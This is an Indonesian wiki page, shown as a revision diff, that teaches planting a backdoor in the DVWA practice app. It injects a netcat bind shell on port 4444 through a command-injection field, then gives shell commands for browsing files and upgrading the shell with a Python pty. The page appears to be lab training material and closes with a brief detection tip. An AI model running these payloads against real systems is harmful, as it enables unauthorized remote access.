Difference between revisions of "DVWA: Command Injection Back Door"
Jump to navigation
Jump to search
Onnowpurbo (talk | contribs) |
Onnowpurbo (talk | contribs) |
||
| Line 34: | Line 34: | ||
* [[DVWA]] | * [[DVWA]] | ||
| + | * [[mkfifo]] | ||
Latest revision as of 14:33, 30 August 2024
Backdoor pada port 4444 menggunakan perintah
mkfifo /tmp/pipe;sh /tmp/pipe | nc -l 4444 > /tmp/pipe
Dari command injection di DVWA masukan
192.168.43.1;mkfifo /tmp/pipe;sh /tmp/pipe | nc -l 4444 > /tmp/pipe
dimana 192.168.43.1 adalah salah satu IP mesin di jaringan
Selanjutnya kita bisa memasukan perintah2 shell seperti
ls cd /etc cat <namafile> dsb
Ujicoba
Percobaan untuk memperoleh shell
python -c 'import pty; pty.spawn("/bin/sh")'
Cek Operasional Back Door
Di sisi server, dapat mencek adanya back door dengan
ps ax
nanti akan kelihatan mkfifo dkk